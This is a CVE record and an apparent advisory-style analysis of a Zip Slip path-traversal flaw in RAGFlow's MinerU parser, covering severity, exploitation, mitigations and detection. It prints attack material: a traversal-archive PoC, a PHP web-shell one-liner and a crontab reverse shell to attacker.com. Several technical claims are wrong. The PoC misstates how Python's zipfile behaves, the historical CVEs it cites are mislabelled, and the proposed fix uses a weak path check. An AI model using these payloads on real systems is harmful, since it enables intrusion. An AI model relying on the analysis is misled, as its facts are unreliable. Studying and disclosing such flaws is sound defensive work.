CVE-2026-24770
CVE-2026-24770
Weakness (CWE)
CVSS Vector
v3.1- Attack Vector
- Network
- Attack Complexity
- Low
- Privileges Required
- None
- User Interaction
- None
- Scope
- Unchanged
- Confidentiality
- High
- Integrity
- High
- Availability
- High
Description
RAGFlow is an open-source RAG (Retrieval-Augmented Generation) engine. In version 0.23.1 and possibly earlier versions, the MinerU parser contains a "Zip Slip" vulnerability, allowing an attacker to overwrite arbitrary files on the server (leading to Remote Code Execution) via a malicious ZIP archive. The MinerUParser class retrieves and extracts ZIP files from an external source (mineru_server_url). The extraction logic in `_extract_zip_no_root` fails to sanitize filenames within the ZIP archive. Commit 64c75d558e4a17a4a48953b4c201526431d8338f contains a patch for the issue.
Comprehensive Technical Analysis of CVE-2026-24770 (RAGFlow "Zip Slip" Vulnerability)
1. Vulnerability Assessment and Severity Evaluation
CVE ID: CVE-2026-24770 CVSS Score: 9.8 (Critical) – AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Vulnerability Type: Zip Slip (Arbitrary File Overwrite → Remote Code Execution - RCE) Affected Component: MinerU Parser (RAGFlow v0.23.1 and earlier)
Severity Breakdown (CVSS v3.1)
| Metric | Value | Explanation |
|---|---|---|
| Attack Vector (AV) | Network (N) | Exploitable remotely over the network. |
| Attack Complexity (AC) | Low (L) | No special conditions required; trivial to exploit. |
| Privileges Required (PR) | None (N) | No authentication or elevated privileges needed. |
| User Interaction (UI) | None (N) | Exploitation does not require user interaction. |
| Scope (S) | Unchanged (U) | Impact is confined to the vulnerable component. |
| Confidentiality (C) | High (H) | Attacker can read sensitive files (e.g., credentials, configs). |
| Integrity (I) | High (H) | Attacker can overwrite critical files (e.g., binaries, configs). |
| Availability (A) | High (H) | RCE can lead to system compromise, denial of service, or data destruction. |
Vulnerability Classification
- CWE-22: Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal")
- CWE-29: Path Traversal: 'Zip Slip'
- CWE-94: Improper Control of Generation of Code ("Code Injection") (if RCE is achieved)
The Zip Slip vulnerability arises from improper sanitization of filenames within ZIP archives, allowing attackers to craft malicious archives that extract files outside the intended directory. This can lead to arbitrary file overwrite, which, in turn, enables Remote Code Execution (RCE) if critical system files (e.g., .bashrc, cron jobs, or web application scripts) are modified.
2. Potential Attack Vectors and Exploitation Methods
Exploitation Prerequisites
- Network Access: The attacker must be able to send a malicious ZIP file to the vulnerable RAGFlow instance (e.g., via an API endpoint or file upload mechanism).
- MinerU Parser Enabled: The
MinerUParserclass must be active and configured to fetch/extract ZIP files from an external source (mineru_server_url). - Writeable Target Directory: The attacker must identify a writable directory where extracted files can overwrite critical system or application files.
Exploitation Steps
Step 1: Crafting a Malicious ZIP Archive
An attacker creates a ZIP file containing files with path traversal sequences (e.g., ../../../etc/passwd or ../../../var/www/html/shell.php). Example:
# Malicious ZIP structure (using `zip` command)
echo 'malicious_payload' > payload.sh
zip malicious.zip '../../tmp/payload.sh' # Path traversal
Alternatively, an attacker could use symbolic links or relative paths to escape the extraction directory.
Step 2: Triggering the Vulnerability
The attacker submits the malicious ZIP file to RAGFlow via:
- Direct API Upload: If RAGFlow exposes an endpoint for ZIP file ingestion.
- Indirect Fetch: If
MinerUParserfetches ZIPs from an attacker-controlledmineru_server_url(e.g., via SSRF or MITM).
Step 3: Arbitrary File Overwrite → RCE
When the vulnerable _extract_zip_no_root function processes the ZIP, it fails to sanitize filenames, allowing:
- Overwriting System Files:
/etc/crontab(to schedule malicious jobs)/etc/passwd(to add a backdoor user)- Web application files (e.g.,
index.php,.htaccess)
- Executing Malicious Code:
- If the attacker overwrites a web-accessible script (e.g.,
shell.php), they can trigger RCE via HTTP. - If they overwrite a system binary (e.g.,
/usr/bin/ls), they can achieve persistence.
- If the attacker overwrites a web-accessible script (e.g.,
Step 4: Post-Exploitation
- Lateral Movement: If RAGFlow runs in a container or cloud environment, the attacker may escalate privileges or move to other systems.
- Data Exfiltration: Sensitive data (e.g., API keys, database credentials) can be stolen.
- Persistence: Backdoors (e.g., reverse shells, cron jobs) can be installed.
3. Affected Systems and Software Versions
Vulnerable Software
- RAGFlow (Open-source RAG engine by Infiniflow)
- Affected Versions: ≤ 0.23.1 (and possibly earlier)
- Patched Version: Fixed in commit
64c75d558e4a17a4a48953b4c201526431d8338f
Affected Components
- MinerU Parser (
MinerUParserclass)- Responsible for fetching and extracting ZIP files from
mineru_server_url. - Vulnerable function:
_extract_zip_no_root(lacks path sanitization).
- Responsible for fetching and extracting ZIP files from
Deployment Scenarios at Risk
- Self-Hosted RAGFlow Instances:
- Enterprises or developers running RAGFlow in on-premises or cloud environments.
- API-Based Deployments:
- If RAGFlow exposes an API for document ingestion (e.g., via ZIP uploads).
- Integrated Systems:
- Applications embedding RAGFlow as a dependency (e.g., AI chatbots, document processing pipelines).
4. Recommended Mitigation Strategies
Immediate Actions (Short-Term)
-
Apply the Patch:
- Upgrade to the latest version of RAGFlow (post-commit
64c75d558e4a17a4a48953b4c201526431d8338f). - If patching is not immediately possible, disable MinerUParser or restrict ZIP file processing.
- Upgrade to the latest version of RAGFlow (post-commit
-
Network-Level Protections:
- Firewall Rules: Restrict inbound traffic to RAGFlow’s API endpoints.
- WAF Rules: Deploy a Web Application Firewall (e.g., ModSecurity) to block path traversal attempts in ZIP filenames.
-
File System Hardening:
- Restrict Write Permissions: Ensure the RAGFlow process runs with minimal privileges (e.g., not as
root). - Use Chroot/Jails: Isolate the extraction process in a restricted environment.
- Immutable Files: Mark critical system files as read-only (
chattr +ion Linux).
- Restrict Write Permissions: Ensure the RAGFlow process runs with minimal privileges (e.g., not as
Long-Term Mitigations
-
Secure Coding Practices:
- Input Validation: Sanitize all filenames in ZIP archives (e.g., reject
../,./, or absolute paths). - Safe Extraction Libraries: Use libraries like Python’s
zipfilewithextractall(path, members)and explicit path checks. - Example Fix (Python):
import os from zipfile import ZipFile def safe_extract(zip_path, extract_dir): with ZipFile(zip_path, 'r') as zip_ref: for file in zip_ref.namelist(): # Reject path traversal attempts if '..' in file or file.startswith('/'): raise ValueError(f"Malicious path detected: {file}") # Ensure extraction stays within target directory target_path = os.path.join(extract_dir, file) if not os.path.abspath(target_path).startswith(os.path.abspath(extract_dir)): raise ValueError(f"Path traversal attempt: {file}") zip_ref.extract(file, extract_dir)
- Input Validation: Sanitize all filenames in ZIP archives (e.g., reject
-
Runtime Protections:
- Containerization: Run RAGFlow in a container with read-only filesystems where possible.
- Seccomp/AppArmor: Restrict system calls (e.g., block
execvefor the RAGFlow process).
-
Monitoring and Detection:
- File Integrity Monitoring (FIM): Use tools like Tripwire or AIDE to detect unauthorized file changes.
- Log Analysis: Monitor for suspicious ZIP uploads or extraction attempts (e.g., logs containing
../or/etc/).
-
Dependency Management:
- SBOM (Software Bill of Materials): Maintain an inventory of dependencies to track vulnerabilities.
- Automated Scanning: Use tools like Dependabot, Snyk, or Trivy to detect vulnerable versions of RAGFlow.
5. Impact on the Cybersecurity Landscape
Broader Implications
-
Rise of AI/ML Supply Chain Attacks:
- As Retrieval-Augmented Generation (RAG) systems become more prevalent, attackers will increasingly target document parsers, embeddings, and ingestion pipelines.
- This vulnerability highlights the need for secure-by-design AI frameworks.
-
Exploitation in the Wild:
- Initial Access: Attackers may use this to gain a foothold in enterprise environments (e.g., via phishing or malicious document uploads).
- Lateral Movement: Once RCE is achieved, attackers can pivot to other systems (e.g., databases, internal APIs).
- Data Poisoning: If RAGFlow is used for training data, attackers could inject malicious content into AI models.
-
Regulatory and Compliance Risks:
- GDPR/CCPA: Unauthorized data access (via RCE) could lead to data breaches and regulatory fines.
- NIST/CIS Controls: Failure to patch may violate NIST SP 800-53 (SI-2) or CIS Control 3 (Vulnerability Management).
-
Third-Party Risk:
- Organizations using RAGFlow as a service (e.g., via cloud providers) may be exposed if the provider fails to patch.
Historical Context
- Zip Slip is a Well-Known Attack Vector:
- Similar vulnerabilities have affected Apache Commons Compress (CVE-2018-11771), Jenkins (CVE-2018-1000861), and WinRAR (CVE-2018-20250).
- Despite being a known issue, developers continue to overlook proper path sanitization in ZIP extraction logic.
6. Technical Details for Security Professionals
Root Cause Analysis
The vulnerability stems from improper path sanitization in the _extract_zip_no_root function of RAGFlow’s MinerUParser class. Key issues:
- Lack of Filename Validation:
- The function does not check for path traversal sequences (
../,./, or absolute paths) in ZIP filenames.
- The function does not check for path traversal sequences (
- Unsafe Extraction:
- Files are extracted without verifying that the target path remains within the intended directory.
- External ZIP Fetching:
- The parser retrieves ZIPs from
mineru_server_url, which could be attacker-controlled (e.g., via SSRF or MITM).
- The parser retrieves ZIPs from
Proof of Concept (PoC)
A minimal PoC to demonstrate the vulnerability:
import os
import zipfile
# Create a malicious ZIP with path traversal
with zipfile.ZipFile('malicious.zip', 'w') as zipf:
zipf.writestr('../../../tmp/payload.sh', '#!/bin/bash\necho "RCE achieved" > /tmp/pwned')
# Simulate the vulnerable extraction (RAGFlow's _extract_zip_no_root)
def vulnerable_extract(zip_path, extract_dir):
with zipfile.ZipFile(zip_path, 'r') as zip_ref:
zip_ref.extractall(extract_dir) # No path sanitization!
vulnerable_extract('malicious.zip', '/tmp/ragflow_extract')
# Result: /tmp/payload.sh is written outside the intended directory
Exploitation in Real-World Scenarios
-
Scenario 1: Direct ZIP Upload
- Attacker uploads a malicious ZIP via RAGFlow’s API.
- The ZIP contains a file like
../../../var/www/html/shell.phpwith PHP code:<?php system($_GET['cmd']); ?> - After extraction, the attacker accesses
http://target/shell.php?cmd=idto achieve RCE.
-
Scenario 2: Indirect ZIP Fetch (SSRF)
- If
mineru_server_urlis configurable, the attacker sets it to a malicious server hosting a crafted ZIP. - RAGFlow fetches and extracts the ZIP, leading to file overwrite.
- If
-
Scenario 3: Container Escape
- If RAGFlow runs in a container, the attacker overwrites
/etc/crontabto execute a reverse shell:* * * * * root /bin/bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'
- If RAGFlow runs in a container, the attacker overwrites
Detection and Forensics
-
Indicators of Compromise (IoCs):
- File System Artifacts:
- Unexpected files in
/tmp/,/var/www/, or/etc/. - Modified system files (e.g.,
/etc/passwd,/etc/crontab).
- Unexpected files in
- Network Artifacts:
- Unusual outbound connections (e.g., reverse shells, C2 traffic).
- ZIP files with suspicious filenames (e.g.,
../../../).
- Log Evidence:
- RAGFlow logs showing ZIP extraction attempts with path traversal.
- Web server logs showing access to unexpected scripts (e.g.,
shell.php).
- File System Artifacts:
-
Forensic Analysis:
- Timeline Analysis: Use
mactime(from Sleuth Kit) to identify when files were modified. - Memory Forensics: Check for malicious processes (e.g., reverse shells) using
Volatility. - ZIP File Analysis: Extract and inspect suspicious ZIPs for path traversal payloads.
- Timeline Analysis: Use
Conclusion
CVE-2026-24770 is a critical Zip Slip vulnerability in RAGFlow’s MinerU parser, enabling arbitrary file overwrite and RCE. Given its CVSS 9.8 score, organizations must patch immediately, harden extraction logic, and monitor for exploitation attempts.
Key Takeaways for Security Teams
✅ Patch Management: Prioritize updating RAGFlow to the latest version. ✅ Input Validation: Ensure all ZIP extraction logic sanitizes filenames. ✅ Least Privilege: Run RAGFlow with minimal permissions. ✅ Monitoring: Deploy FIM and WAF rules to detect exploitation. ✅ AI Security: Recognize that RAG systems are high-value targets for supply chain attacks.
This vulnerability underscores the importance of secure coding practices in AI/ML frameworks, particularly in document ingestion pipelines where untrusted input is processed.